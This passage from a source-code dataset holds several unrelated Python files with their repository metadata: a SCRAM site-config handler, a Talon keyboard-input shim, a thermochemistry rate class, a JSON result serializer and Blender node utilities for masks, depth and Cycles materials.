"MIT"
] | 24
|
2015-01-07T08:16:28.000Z
|
2022-03-26T08:20:27.000Z
|
SCRAM/Core/SiteConfig.py
|
gudrutis/pySCRAM
|
662aa639caa52d0ccc931f0ed41f245ad37c9765
|
[
"MIT"
] | 2
|
2018-10-08T11:31:44.000Z
|
2021-11-15T08:01:12.000Z
|
from sys import stderr
from os.path import join, exists
from re import match
from os import environ
class SiteConfig(object):
def __init__(self):
self.siteconf = 'etc/scramrc/site.cfg'
self.site = {'release-checks': {}, 'release-checks-timeout': {}}
self.site['release-checks']['value'] = "1"
self.site['release-checks']['valid_values'] = '0|1|yes|no'
        self.site['release-checks']['help'] = "Enable/disable release checks, e.g. " \
                                              "production architectures, deprecated releases. This avoids " \
                                              "accessing release information from the internet."
self.site['release-checks-timeout']['value'] = "10"
self.site['release-checks-timeout']['valid_values'] = '[3-9]|[1-9][0-9]+'
self.site['release-checks-timeout']['help'] = "Time in seconds after which " \
"a request to get release information should be timed out " \
"(min. value 3s)."
self.readSiteConfig()
return
def readSiteConfig(self):
conf = join(environ['SCRAM_LOOKUPDB'], self.siteconf)
if not exists(conf):
return
with open(conf, 'r') as ref:
for line in [l.strip('\n').strip() for l in ref.readlines() if '=' in l]:
if line.startswith('#'):
continue
data = [x.strip() for x in line.split('=', 1)]
if not data[0] in self.site:
self.site[data[0]] = {}
self.site[data[0]]['value'] = data[1]
return
def dump(self, key=""):
data = []
if key and (key in self.site) and ('valid_values' in self.site[key]):
data.append(key)
else:
data = sorted(list(self.site))
print("Following SCRAM site configuration parameters are available:")
for key in data:
if 'valid_values' in self.site[key]:
print(" Name : %s" % key)
print(" Value : %s" % self.site[key]['value'])
print(" Valid values: %s" % self.site[key]['valid_values'])
print(" Purpose : %s\n" % self.site[key]['help'])
return True
def get(self, key):
if (key not in self.site) or ('valid_values' not in self.site[key]):
print("ERROR: Unknown site configuration parameter '%s'. "
"Known parameters are" % key, file=stderr)
for key in self.site:
if 'valid_values' not in self.site[key]:
continue
print(" * %s" % key, file=stderr)
return None
return self.site[key]['value']
def set(self, key, value):
cvalue = self.get(key)
if cvalue is None:
return False
valid_value = self.site[key]['valid_values']
if not match('^%s$' % valid_value, value):
print("ERROR: Invalid value '%s' provided. Valid value for %s "
"should match '%s'" % (value, key, valid_value), file=stderr)
return False
print('%s=%s' % (key, value))
if cvalue == value:
return True
self.site[key]['value'] = value
conf = join(environ['SCRAM_LOOKUPDB'], self.siteconf)
with open(conf, 'w') as ref:
for key in self.site:
ref.write('%s=%s\n' % (key, self.site[key]['value']))
return True
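# --- Hedged usage sketch (editor addition) ---
# Assumes SCRAM_LOOKUPDB points at a directory whose etc/scramrc subfolder
# already exists; the path and values below are placeholders.
#
#   import os
#   os.environ.setdefault('SCRAM_LOOKUPDB', '/tmp/scram-db')
#   sc = SiteConfig()
#   sc.dump()                            # list known parameters
#   sc.set('release-checks', 'no')       # validated against '0|1|yes|no'
#   print(sc.get('release-checks-timeout'))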
| 43.585366
| 115
| 0.510912
|
from sys import stderr
from os.path import join, exists
from re import match
from os import environ
class SiteConfig(object):
def __init__(self):
self.siteconf = 'etc/scramrc/site.cfg'
self.site = {'release-checks': {}, 'release-checks-timeout': {}}
self.site['release-checks']['value'] = "1"
self.site['release-checks']['valid_values'] = '0|1|yes|no'
        self.site['release-checks']['help'] = "Enable/disable release checks, e.g. " \
                                              "production architectures, deprecated releases. This avoids " \
                                              "accessing release information from the internet."
self.site['release-checks-timeout']['value'] = "10"
self.site['release-checks-timeout']['valid_values'] = '[3-9]|[1-9][0-9]+'
self.site['release-checks-timeout']['help'] = "Time in seconds after which " \
"a request to get release information should be timed out " \
"(min. value 3s)."
self.readSiteConfig()
return
def readSiteConfig(self):
conf = join(environ['SCRAM_LOOKUPDB'], self.siteconf)
if not exists(conf):
return
with open(conf, 'r') as ref:
for line in [l.strip('\n').strip() for l in ref.readlines() if '=' in l]:
if line.startswith('#'):
continue
data = [x.strip() for x in line.split('=', 1)]
if not data[0] in self.site:
self.site[data[0]] = {}
self.site[data[0]]['value'] = data[1]
return
def dump(self, key=""):
data = []
if key and (key in self.site) and ('valid_values' in self.site[key]):
data.append(key)
else:
data = sorted(list(self.site))
print("Following SCRAM site configuration parameters are available:")
for key in data:
if 'valid_values' in self.site[key]:
print(" Name : %s" % key)
print(" Value : %s" % self.site[key]['value'])
print(" Valid values: %s" % self.site[key]['valid_values'])
print(" Purpose : %s\n" % self.site[key]['help'])
return True
def get(self, key):
if (key not in self.site) or ('valid_values' not in self.site[key]):
print("ERROR: Unknown site configuration parameter '%s'. "
"Known parameters are" % key, file=stderr)
for key in self.site:
if 'valid_values' not in self.site[key]:
continue
print(" * %s" % key, file=stderr)
return None
return self.site[key]['value']
def set(self, key, value):
cvalue = self.get(key)
if cvalue is None:
return False
valid_value = self.site[key]['valid_values']
if not match('^%s$' % valid_value, value):
print("ERROR: Invalid value '%s' provided. Valid value for %s "
"should match '%s'" % (value, key, valid_value), file=stderr)
return False
print('%s=%s' % (key, value))
if cvalue == value:
return True
self.site[key]['value'] = value
conf = join(environ['SCRAM_LOOKUPDB'], self.siteconf)
with open(conf, 'w') as ref:
for key in self.site:
ref.write('%s=%s\n' % (key, self.site[key]['value']))
return True
| true
| true
|
1c40f4310d253031dc57ddc58e471fbf7ff1469b
| 857
|
py
|
Python
|
games/utils/switch_input.py
|
ja-mesmugford/talon_config
|
d30e02f30873986b899bd1f10efc7442c6bd6d22
|
[
"MIT"
] | 1
|
2022-02-04T06:19:23.000Z
|
2022-02-04T06:19:23.000Z
|
games/utils/switch_input.py
|
ja-mesmugford/talon_config
|
d30e02f30873986b899bd1f10efc7442c6bd6d22
|
[
"MIT"
] | null | null | null |
games/utils/switch_input.py
|
ja-mesmugford/talon_config
|
d30e02f30873986b899bd1f10efc7442c6bd6d22
|
[
"MIT"
] | null | null | null |
"""This module is a stopgap to improve game compatibility.
Replaces Talon's native input within certain contexts.
"""
import time
def switch_to_keyboard_module(context):
"""Switch to using the PyPI `keyboard` module for input in this context.
Some games aren't registering Talon's input as of Windows beta 988 (for
example, Europa Universalis IV). However, the PyPi `keyboard` module seems
to work ok.
"""
import keyboard
@context.action_class("main")
class MainActions:
def key(key: str):
# Naive method - this may not cover all keys.
for individual_press in key.split(" "):
keys = individual_press.split("-")
keyboard.press_and_release("+".join(keys))
# TODO: Integrate key settings, switch this delay
time.sleep(0.02)
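# --- Hedged usage sketch (editor addition) ---
# A game-specific Talon module might opt in like this (the app match string
# is a placeholder):
#
#   from talon import Context
#   ctx = Context()
#   ctx.matches = "app.name: eu4"
#   switch_to_keyboard_module(ctx)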
| 29.551724
| 78
| 0.644107
|
import time
def switch_to_keyboard_module(context):
import keyboard
@context.action_class("main")
class MainActions:
def key(key: str):
for individual_press in key.split(" "):
keys = individual_press.split("-")
keyboard.press_and_release("+".join(keys))
time.sleep(0.02)
| true
| true
|
1c40f4f29e2db0b4751f30f3a623537319be4258
| 3,312
|
py
|
Python
|
project/code/thermo.py
|
HeyItsRiddhi/cs207_riddhi_shah
|
18d7d6f1fcad213ce35a93ee33c03620f8b06b65
|
[
"MIT"
] | null | null | null |
project/code/thermo.py
|
HeyItsRiddhi/cs207_riddhi_shah
|
18d7d6f1fcad213ce35a93ee33c03620f8b06b65
|
[
"MIT"
] | null | null | null |
project/code/thermo.py
|
HeyItsRiddhi/cs207_riddhi_shah
|
18d7d6f1fcad213ce35a93ee33c03620f8b06b65
|
[
"MIT"
] | null | null | null |
"""Thermodynamics and Thermochemistry for Chemical Kinetics
This module contains a thermochem class with methods for
computing the backward reaction rates for a set of
reversible, elementary reactions.
"""
import numpy as np
class thermochem:
"""Methods for calculating the backward reaction rate.
Cp_over_R: Returns specific heat of each specie given by
the NASA polynomials.
H_over_RT: Returns the enthalpy of each specie given by
the NASA polynomials.
S_over_R: Returns the entropy of each specie given by
the NASA polynomials.
backward_coeffs: Returns the backward reaction rate
    coefficient for each reaction.
Please see the notes in each routine for clarifications and
warnings. You will need to customize these methods (and
likely the entire class) to suit your own code base.
Nevertheless, it is hoped that you will find these methods
to be of some use.
"""
def __init__(self, rxnset):
self.rxnset = rxnset
self.p0 = 1.0e+05 # Pa
self.R = 8.3144598 # J / mol / K
self.gamma = np.sum(self.rxnset.nuij, axis=0)
def Cp_over_R(self, T):
# WARNING: This line will depend on your own data structures!
# Be careful to get the correct coefficients for the appropriate
# temperature range. That is, for T <= Tmid get the low temperature
# range coeffs and for T > Tmid get the high temperature range coeffs.
a = self.rxnset.nasa7_coeffs
Cp_R = (a[:,0] + a[:,1] * T + a[:,2] * T**2.0
+ a[:,3] * T**3.0 + a[:,4] * T**4.0)
return Cp_R
def H_over_RT(self, T):
# WARNING: This line will depend on your own data structures!
# Be careful to get the correct coefficients for the appropriate
# temperature range. That is, for T <= Tmid get the low temperature
# range coeffs and for T > Tmid get the high temperature range coeffs.
a = self.rxnset.nasa7_coeffs
H_RT = (a[:,0] + a[:,1] * T / 2.0 + a[:,2] * T**2.0 / 3.0
+ a[:,3] * T**3.0 / 4.0 + a[:,4] * T**4.0 / 5.0
+ a[:,5] / T)
return H_RT
def S_over_R(self, T):
# WARNING: This line will depend on your own data structures!
# Be careful to get the correct coefficients for the appropriate
# temperature range. That is, for T <= Tmid get the low temperature
# range coeffs and for T > Tmid get the high temperature range coeffs.
a = self.rxnset.nasa7_coeffs
S_R = (a[:,0] * np.log(T) + a[:,1] * T + a[:,2] * T**2.0 / 2.0
+ a[:,3] * T**3.0 / 3.0 + a[:,4] * T**4.0 / 4.0 + a[:,6])
return S_R
def backward_coeffs(self, kf, T):
# Change in enthalpy and entropy for each reaction
delta_H_over_RT = np.dot(self.rxnset.nuij.T, self.H_over_RT(T))
delta_S_over_R = np.dot(self.rxnset.nuij.T, self.S_over_R(T))
# Negative of change in Gibbs free energy for each reaction
delta_G_over_RT = delta_S_over_R - delta_H_over_RT
# Prefactor in Ke
fact = self.p0 / self.R / T
# Ke
kb = fact**self.gamma * np.exp(delta_G_over_RT)
return kf / kb
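if __name__ == "__main__":
    # --- Hedged usage sketch (editor addition) ---
    # A minimal stand-in reaction set exposing only the two attributes this
    # class reads: nasa7_coeffs (n_species x 7) and nuij (n_species x
    # n_reactions). The numbers below are placeholders, not real NASA-7 data.
    class _MockRxnSet:
        nasa7_coeffs = np.array([[3.5, 0.0, 0.0, 0.0, 0.0, -1.0e3, 4.0],
                                 [2.5, 0.0, 0.0, 0.0, 0.0, -2.0e3, 3.0]])
        nuij = np.array([[-1.0],
                         [1.0]])  # one reaction: specie 0 -> specie 1
    tc = thermochem(_MockRxnSet())
    print(tc.backward_coeffs(kf=np.array([1.0e5]), T=1500.0))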
| 36.395604
| 78
| 0.602053
|
import numpy as np
class thermochem:
def __init__(self, rxnset):
self.rxnset = rxnset
self.p0 = 1.0e+05
self.R = 8.3144598
self.gamma = np.sum(self.rxnset.nuij, axis=0)
def Cp_over_R(self, T):
a = self.rxnset.nasa7_coeffs
Cp_R = (a[:,0] + a[:,1] * T + a[:,2] * T**2.0
+ a[:,3] * T**3.0 + a[:,4] * T**4.0)
return Cp_R
def H_over_RT(self, T):
a = self.rxnset.nasa7_coeffs
H_RT = (a[:,0] + a[:,1] * T / 2.0 + a[:,2] * T**2.0 / 3.0
+ a[:,3] * T**3.0 / 4.0 + a[:,4] * T**4.0 / 5.0
+ a[:,5] / T)
return H_RT
def S_over_R(self, T):
a = self.rxnset.nasa7_coeffs
S_R = (a[:,0] * np.log(T) + a[:,1] * T + a[:,2] * T**2.0 / 2.0
+ a[:,3] * T**3.0 / 3.0 + a[:,4] * T**4.0 / 4.0 + a[:,6])
return S_R
def backward_coeffs(self, kf, T):
delta_H_over_RT = np.dot(self.rxnset.nuij.T, self.H_over_RT(T))
delta_S_over_R = np.dot(self.rxnset.nuij.T, self.S_over_R(T))
delta_G_over_RT = delta_S_over_R - delta_H_over_RT
fact = self.p0 / self.R / T
kb = fact**self.gamma * np.exp(delta_G_over_RT)
return kf / kb
| true
| true
|
1c40f60cd66cb57d752b99ae0302f7849ac74e37
| 579
|
py
|
Python
|
package/cloudshell/cp/azure/common/parsers/command_result_parser.py
|
tim-spiglanin/Azure-Shell
|
58c52994f0d6cfd798c5dca33737419ec18363d4
|
[
"Apache-2.0"
] | 5
|
2016-09-08T08:33:47.000Z
|
2020-02-10T12:31:15.000Z
|
package/cloudshell/cp/aws/domain/services/parsers/command_results_parser.py
|
QualiSystemsLab/AWS-Shell-ext
|
bf7b62640d8d97a5e9199edb7a1ada0b98aac6fb
|
[
"0BSD"
] | 505
|
2016-08-09T07:41:03.000Z
|
2021-02-08T20:26:46.000Z
|
package/cloudshell/cp/aws/domain/services/parsers/command_results_parser.py
|
QualiSystemsLab/AWS-Shell-ext
|
bf7b62640d8d97a5e9199edb7a1ada0b98aac6fb
|
[
"0BSD"
] | 9
|
2016-06-20T11:41:54.000Z
|
2020-11-21T00:42:45.000Z
|
import jsonpickle
class CommandResultsParser(object):
def set_command_result(self, result, unpicklable=False):
"""
Serializes output as JSON and writes it to console output wrapped with special prefix and suffix
:param result: Result to return
:param unpicklable: If True adds JSON can be deserialized as real object.
When False will be deserialized as dictionary
"""
json = jsonpickle.encode(result, unpicklable=unpicklable)
result_for_output = str(json)
return result_for_output
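# --- Hedged usage sketch (editor addition) ---
#   parser = CommandResultsParser()
#   parser.set_command_result({'vm_name': 'demo', 'ok': True})
#   # -> roughly '{"vm_name": "demo", "ok": true}': plain JSON, because
#   #    unpicklable=False drops jsonpickle's py/object type tags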
| 38.6
| 104
| 0.678756
|
import jsonpickle
class CommandResultsParser(object):
def set_command_result(self, result, unpicklable=False):
json = jsonpickle.encode(result, unpicklable=unpicklable)
result_for_output = str(json)
return result_for_output
| true
| true
|
1c40f9e39c4c934d336e12ba96942af24833e077
| 20,369
|
py
|
Python
|
Node_Utility.py
|
SBCV/PythonBlenderUtility
|
4f91c5a356fede103bcb8c2a9ba1d4d0b01aadc3
|
[
"MIT"
] | 1
|
2022-01-30T05:58:06.000Z
|
2022-01-30T05:58:06.000Z
|
Node_Utility.py
|
SBCV/PythonBlenderUtility
|
4f91c5a356fede103bcb8c2a9ba1d4d0b01aadc3
|
[
"MIT"
] | null | null | null |
Node_Utility.py
|
SBCV/PythonBlenderUtility
|
4f91c5a356fede103bcb8c2a9ba1d4d0b01aadc3
|
[
"MIT"
] | null | null | null |
import bpy
import os
from collections import defaultdict
from Utility.Logging_Extension import logger
# http://blender.stackexchange.com/questions/8936/does-switching-from-blender-render-to-cycles-mess-things-up
# * All materials in cycles use nodes (even if you set up the material in the Properties panel, it will create
# nodes in the node editor).
# * Since BI materials don't use nodes by default, when you switch to cycles from BI there won't be any BI
# nodes in the node tree, yet nodes will be enabled. This will make the material render as transparent.
# One must toggle use_nodes on such materials
# Remark:
# info panel in cycles:
# the info panel in cycles misses a lot of commands
# http://blender.stackexchange.com/questions/18020/print-all-commands-in-the-info-view
# https://www.blender.org/api/blender_python_api_2_72_release/info_api_reference.html#operators
# Most key-strokes and buttons in Blender call an operator which is also exposed to python via bpy.ops,
# To see the Python equivalent hover your mouse over the button and see the tool-tip,
# eg Python: bpy.ops.render.render(), If there is no tool-tip or the Python: line is missing then this button
# is not using an operator and can't be accessed from Python.
# If you want to use this in a script you can press Control-C while your mouse is over the button to copy it to the
# clipboard.
# =================
# alternative approach (not tested yet)
# http://blender.stackexchange.com/questions/364/how-do-i-convert-materials-from-blender-internal-to-cycles
# https://blenderartists.org/forum/showthread.php?247271-Cycles-Automatic-Material-Textures-Node
def rearrange_nodes():
logger.info('rearrange_nodes: ...')
# TODO
# https://www.blendernation.com/2015/11/03/development-cleaning-up-node-trees/
# https://github.com/JuhaW/NodeArrange/blob/master/__init__.py
assert False
def create_viewer_node(scene, preceeding_node_name, preceeding_channel_name):
"""
For debug purposes. Allows to visualize intermediate nodes.
:param scene:
:param preceeding_node_name:
:param preceeding_channel_name:
:return:
"""
logger.info('create_viewer_node: ...')
scene_nodes = scene.node_tree.nodes
scene_links = scene.node_tree.links
mask_id_node = scene_nodes.get(preceeding_node_name)
viewer_node = scene_nodes.new('CompositorNodeViewer')
scene_links.new(mask_id_node.outputs[preceeding_channel_name],
viewer_node.inputs['Image'])
logger.info('create_viewer_node: Done')
def create_depth_viewer_node(scene):
"""
This will save the z buffer in the Viewer Node after rendering
bpy.ops.render.render()
rendered_image = bpy.data.images['Viewer Node']
pixels = rendered_image.pixels
:param scene:
:return:
"""
logger.info('create_depth_output_nodes: ...')
scene.use_nodes = True
scene_nodes = scene.node_tree.nodes
scene_links = scene.node_tree.links
default_render_layers_node = scene_nodes.get('Render Layers')
# output_value = default_render_layers_node.outputs[output_type]
# print(type(output_value))
viewer_node = scene_nodes.get('Depth Viewer')
if viewer_node is None:
viewer_node = scene_nodes.new('CompositorNodeViewer')
viewer_node.name = 'Depth Viewer'
logger.vinfo('viewer_node.name', viewer_node.name)
viewer_node.use_alpha = False
output_type = 'Depth'
scene_links.new(
default_render_layers_node.outputs[output_type],
viewer_node.inputs[0]) # link Z to output
logger.info('create_depth_output_nodes: Done')
def create_additional_optical_flow_output_nodes(scene,
output_path=None,
image_stem=None,
leading_zeroes_template='#####'):
logger.info('create_additional_optical_flow_output_nodes: ...')
default_render_layer = scene.render.layers.get(scene.render.layers.active.name)
default_render_layer.use_pass_vector = True
default_render_layer.pass_alpha_threshold = 0
scene.use_nodes = True
scene_links = scene.node_tree.links
scene_nodes = scene.node_tree.nodes
default_render_layers_node = scene_nodes.get('Render Layers')
optical_flow_output_node = scene_nodes.new('CompositorNodeOutputFile')
optical_flow_output_node.format.file_format = 'OPEN_EXR'
#optical_flow_output_node.format.use_zbuffer = True # Store floats
if output_path is not None:
optical_flow_output_node.base_path = output_path
if image_stem is not None:
optical_flow_output_node.file_slots[0].path = image_stem + leading_zeroes_template
scene_links.new(default_render_layers_node.outputs['Vector'],
optical_flow_output_node.inputs['Image'])
logger.info('create_additional_optical_flow_output_nodes: Done')
return optical_flow_output_node
def create_additional_depth_output_nodes(scene,
output_path=None,
image_stem=None,
leading_zeroes_template='#####'):
logger.info('create_additional_depth_output_nodes: ...')
default_render_layer = scene.render.layers.get(scene.render.layers.active.name)
default_render_layer.pass_alpha_threshold = 0
scene.use_nodes = True
scene_nodes = scene.node_tree.nodes
scene_links = scene.node_tree.links
default_render_layers_node = scene_nodes.get('Render Layers')
depth_image_output_node = scene_nodes.new('CompositorNodeOutputFile')
depth_image_output_node.format.file_format = 'OPEN_EXR'
depth_image_output_node.format.use_zbuffer = True # Store floats
if output_path is not None:
depth_image_output_node.base_path = output_path
if image_stem is not None:
depth_image_output_node.file_slots[0].path = image_stem + leading_zeroes_template
scene_links.new(default_render_layers_node.outputs['Depth'],
depth_image_output_node.inputs['Image'])
logger.info('create_additional_depth_output_nodes: Done')
return depth_image_output_node
def create_additional_mask_output_nodes(scene,
object_index,
output_path=None,
image_stem=None,
leading_zeroes_template='#####'):
logger.info('create_additional_mask_output_nodes: ...')
# Make sure that the render layer passes the object index
default_render_layer = scene.render.layers.get(scene.render.layers.active.name)
# Add additional pass values
# default_render_layer.use_pass_combined = True
# default_render_layer.use_pass_mist = True
# default_render_layer.use_pass_normal = True
# default_render_layer.use_pass_vector = True
# default_render_layer.use_pass_uv = True
default_render_layer.use_pass_object_index = True
# default_render_layer.use_pass_material_index = True
# default_render_layer.use_pass_shadow = True
# ========== IMPORTANT FOR TRANSPARENT MATERIALS =========
default_render_layer.pass_alpha_threshold = 0
scene.use_nodes = True
scene_nodes = scene.node_tree.nodes
scene_links = scene.node_tree.links
default_render_layers_node = scene_nodes.get('Render Layers')
mask_node = scene_nodes.new('CompositorNodeIDMask')
mask_node.index = object_index
mask_node.use_antialiasing = True
image_output_node = scene_nodes.new('CompositorNodeOutputFile')
if output_path is not None:
image_output_node.base_path = output_path
if image_stem is not None:
image_output_node.file_slots[0].path = image_stem + leading_zeroes_template
scene_links.new(
default_render_layers_node.outputs['IndexOB'],
mask_node.inputs['ID value'])
scene_links.new(
mask_node.outputs['Alpha'],
image_output_node.inputs['Image'])
logger.info('create_additional_mask_output_nodes: Done')
return mask_node, image_output_node
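# --- Hedged usage sketch (editor addition) ---
# The masked object must carry the same pass index that the ID mask node
# filters on; the object name and paths below are placeholders.
#
#   obj = bpy.data.objects['Cube']
#   obj.pass_index = 7
#   create_additional_mask_output_nodes(
#       bpy.context.scene, object_index=7,
#       output_path='/tmp/masks', image_stem='mask_')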
def create_simple_material():
logger.info('Create Simple Material: ...')
simple_material = bpy.data.materials.new('simple_material')
simple_material.use_nodes = True
simple_material_nodes = simple_material.node_tree.nodes
simple_material_links = simple_material.node_tree.links
shader_node_diffuse_bsdf = simple_material_nodes.get(NodeUtility.DIFFUSE_BSDF)
shader_node_diffuse_bsdf.inputs[0].default_value = [255,0,0, 1]
return simple_material
def enable_backdrop(enable=True):
logger.info('enable_backdrop: ...')
# Enable backdrop
for area in bpy.context.screen.areas:
if area.type == 'NODE_EDITOR':
for space in area.spaces:
if space.type == 'NODE_EDITOR':
logger.info('Backdrop Enabled')
space.show_backdrop = enable
break
logger.info('enable_backdrop: Done')
class NodeUtility:
USE_MAP_COLOR_DIFFUSE = 'use_map_color_diffuse'
USE_MAP_NORMAL = 'use_map_normal'
DIFFUSE_BSDF = 'Diffuse BSDF'
GLOSSY_BSDF = 'Glossy BSDF'
TRANSPARENT_BSDF = 'Transparent BSDF'
GLASS_BSDF = 'Glass BSDF'
EMISSION = 'Emission'
OBJECT_INFO = 'Object Info'
MATERIAL_OUTPUT = 'Material Output'
SHADER_NODE_RGB = 'ShaderNodeRGB'
SHADER_NODE_MIX_RGB = 'ShaderNodeMixRGB'
SHADER_NODE_EMISSION = 'ShaderNodeEmission'
SHADER_NODE_BSDF_GLASS = 'ShaderNodeBsdfGlass'
SHADER_NODE_OBJECT_INFO = 'ShaderNodeObjectInfo'
@staticmethod
def _collect_texture(type_to_texture_file_path, use_map_type, filepath):
logger.debug('filepath: ' + filepath)
if type_to_texture_file_path[use_map_type] is None:
type_to_texture_file_path[use_map_type] = filepath
else:
logger.warning('Two Textures with the same use_type:')
logger.warning('First: ' + use_map_type + ', ' + type_to_texture_file_path[use_map_type])
logger.warning('Second: ' + use_map_type + ', ' + filepath)
logger.warning('We use the first texture as : ' + use_map_type)
@staticmethod
def _get_blender_internal_texture_type_to_file_paths(material):
some_other_name = material.name
logger.debug(some_other_name)
# fprint('material: ' + material.name)
texture_name_set = set()
texture_type_to_file_path = defaultdict(lambda: None)
for texture_slot in material.texture_slots:
if texture_slot:
texture = texture_slot.texture
texture_name_set.add(texture)
# fprint('texture: ' + texture.name)
if hasattr(texture, 'image'):
logger.debug('Material: ' + material.name + ', Texture: ' + texture.name)
logger.debug('use_map_color_diffuse: ' + str(texture_slot.use_map_color_diffuse))
logger.debug('use_map_normal: ' + str(texture_slot.use_map_normal))
# ==== Remark ====
# Relative paths start with '//' and are relative to the blend file.
# The prefix of paths to textures packed inside the .blend file are dependent on the original
# file path. For example <blend_file_folder>/textures/texture_file.ext, i.e. look like the
# following '//textures/<texturename>.<textureextension>'
if texture.image.packed_file is not None:
logger.debug('Image is packed')
                        # If the texture is packed, the file is definitely valid; otherwise check the file
image_is_valid = True
else:
logger.debug('Image is an external source')
image_is_valid = os.path.isfile(bpy.path.abspath(texture.image.filepath))
if image_is_valid:
if texture_slot.use_map_color_diffuse:
NodeUtility._collect_texture(texture_type_to_file_path,
NodeUtility.USE_MAP_COLOR_DIFFUSE,
texture.image.filepath)
elif texture_slot.use_map_normal:
NodeUtility._collect_texture(texture_type_to_file_path,
NodeUtility.USE_MAP_NORMAL,
texture.image.filepath)
logger.info('texture_type_to_file_path: ' + str(texture_type_to_file_path))
return texture_type_to_file_path
@staticmethod
def replace_bsdf_node_in_material(material, old_node, new_node, preceding_node=None, next_node=None):
nodes = material.node_tree.nodes
links = material.node_tree.links
        # we replace the old BSDF node with a new one
nodes.remove(old_node)
if preceding_node is not None:
links.new(preceding_node.outputs[0], new_node.inputs[0])
if next_node is not None:
links.new(new_node.outputs[0], next_node.inputs[0])
@staticmethod
def create_material_nodes_for_cycle_using_blender_internal_textures(material_default_bsdf_type=DIFFUSE_BSDF,
transparent_default_bsdf_type=TRANSPARENT_BSDF):
"""
:param material_default_bsdf_type: DIFFUSE_BSDF or GLOSSY_BSDF
:param transparent_default_bsdf_type: TRANSPARENT_BSDF or GLASS_BSDF
:return:
"""
logger.info('create_material_nodes_for_cycle_using_blender_internal_textures: ...')
bpy.context.scene.render.engine = 'CYCLES'
# # each object has several material slots, which link to the materials provided in bpy.data.materials
# for material in bpy.data.materials:
for object in bpy.data.objects:
logger.debug('object.name: ' + object.name)
for material_slot in object.material_slots:
material = material_slot.material
# https://wiki.blender.org/index.php/Dev:Py/Scripts/Cookbook/Code_snippets/Nodes
logger.info('material.name: ' + material.name)
# change only blender internal materials (keep cycle materials as is)
if not material.use_nodes:
logger.debug('Adding nodes ...')
# this adds by default a node "Material Output" and a node "Diffuse BSDF"
material.use_nodes = True
# get the "Diffuse BSDF" node
nodes = material.node_tree.nodes
links = material.node_tree.links
                    # this diffuse node automatically inherits the color of the material
shader_node_diffuse_bsdf = nodes.get(NodeUtility.DIFFUSE_BSDF)
shader_node_material_output = nodes.get("Material Output")
                    # These texture file paths should be valid
texture_type_to_file_path = NodeUtility._get_blender_internal_texture_type_to_file_paths(material)
# 1 Case: Material is just a texture
# Image Texture -> Diffuse BSDF/Glossy BSDF -> Material Output
color_texture_file_path = texture_type_to_file_path[NodeUtility.USE_MAP_COLOR_DIFFUSE]
logger.debug('color_texture_file_path: ' + str(color_texture_file_path))
if color_texture_file_path is not None:
logger.debug('Converting Material With Texture: ' + color_texture_file_path)
logger.debug('Texture path is valid')
# test if the image texture node has already been created
shader_node_tex_image = nodes.get("Image Texture")
if not shader_node_tex_image:
shader_node_tex_image = nodes.new(type='ShaderNodeTexImage')
shader_node_tex_image.image = bpy.data.images.load(color_texture_file_path)
# link the nodes
links.new(shader_node_tex_image.outputs[0], shader_node_diffuse_bsdf.inputs[0])
# if material_default_bsdf_type == BICyclesMaterialConverter.GLOSSY_BSDF:
#
# logger.debug('Replace Diffuse Material Node with Glossy Material Node' )
# shader_node_glossy_bsdf = nodes.get(BICyclesMaterialConverter.GLOSSY_BSDF)
# if not shader_node_glossy_bsdf:
#
# shader_node_glossy_bsdf = nodes.new(type='ShaderNodeBsdfGlossy')
#
# BICyclesMaterialConverter._replace_bsdf_node(material,
# old_node=shader_node_diffuse_bsdf,
# new_node=shader_node_glossy_bsdf,
# preceding_node=shader_node_tex_image,
# next_node=shader_node_material_output)
# 2 Case: Material is transparent
# RGB -> Transparent BSDF/Glass BSDF -> Material Output
elif material.use_transparency:
logger.debug('Converting Transparent Material')
shader_node_transparent_or_glass_bsdf = nodes.get(transparent_default_bsdf_type)
if not shader_node_transparent_or_glass_bsdf:
if transparent_default_bsdf_type == NodeUtility.GLASS_BSDF:
shader_node_transparent_or_glass_bsdf = nodes.new(type='ShaderNodeBsdfGlass')
else:
shader_node_transparent_or_glass_bsdf = nodes.new(type='ShaderNodeBsdfTransparent')
shader_node_RGB = nodes.new(type='ShaderNodeRGB')
NodeUtility.replace_bsdf_node_in_material(material,
old_node=shader_node_diffuse_bsdf,
new_node=shader_node_transparent_or_glass_bsdf,
preceding_node=shader_node_RGB,
next_node=shader_node_material_output)
else:
logger.debug('Converting Material With Simple Color')
# by default there is just a diffuse bsdf created using the color of the material
if material_default_bsdf_type == NodeUtility.GLOSSY_BSDF:
logger.debug('Replace Diffuse Material Node with Glossy Material Node')
shader_node_glossy_bsdf = nodes.get(NodeUtility.GLOSSY_BSDF)
if not shader_node_glossy_bsdf:
shader_node_glossy_bsdf = nodes.new(type='ShaderNodeBsdfGlossy')
NodeUtility.replace_bsdf_node_in_material(material,
old_node=shader_node_diffuse_bsdf,
new_node=shader_node_glossy_bsdf,
preceding_node=None,
next_node=shader_node_material_output)
else:
logger.debug('Material has already a node ...')
logger.info('create_material_nodes_for_cycle_using_blender_internal_textures: Done')
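# --- Hedged usage sketch (editor addition) ---
# Typical call when porting a Blender-Internal scene to Cycles (run from
# Blender's Python console with the .blend file loaded):
#
#   NodeUtility.create_material_nodes_for_cycle_using_blender_internal_textures(
#       material_default_bsdf_type=NodeUtility.DIFFUSE_BSDF,
#       transparent_default_bsdf_type=NodeUtility.GLASS_BSDF)
#   enable_backdrop(True)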
| 43.804301
| 120
| 0.62276
|
import bpy
import os
from collections import defaultdict
from Utility.Logging_Extension import logger
def rearrange_nodes():
logger.info('rearrange_nodes: ...')
# TODO
# https://www.blendernation.com/2015/11/03/development-cleaning-up-node-trees/
# https://github.com/JuhaW/NodeArrange/blob/master/__init__.py
assert False
def create_viewer_node(scene, preceeding_node_name, preceeding_channel_name):
logger.info('create_viewer_node: ...')
scene_nodes = scene.node_tree.nodes
scene_links = scene.node_tree.links
mask_id_node = scene_nodes.get(preceeding_node_name)
viewer_node = scene_nodes.new('CompositorNodeViewer')
scene_links.new(mask_id_node.outputs[preceeding_channel_name],
viewer_node.inputs['Image'])
logger.info('create_viewer_node: Done')
def create_depth_viewer_node(scene):
logger.info('create_depth_output_nodes: ...')
scene.use_nodes = True
scene_nodes = scene.node_tree.nodes
scene_links = scene.node_tree.links
default_render_layers_node = scene_nodes.get('Render Layers')
# output_value = default_render_layers_node.outputs[output_type]
# print(type(output_value))
viewer_node = scene_nodes.get('Depth Viewer')
if viewer_node is None:
viewer_node = scene_nodes.new('CompositorNodeViewer')
viewer_node.name = 'Depth Viewer'
logger.vinfo('viewer_node.name', viewer_node.name)
viewer_node.use_alpha = False
output_type = 'Depth'
scene_links.new(
default_render_layers_node.outputs[output_type],
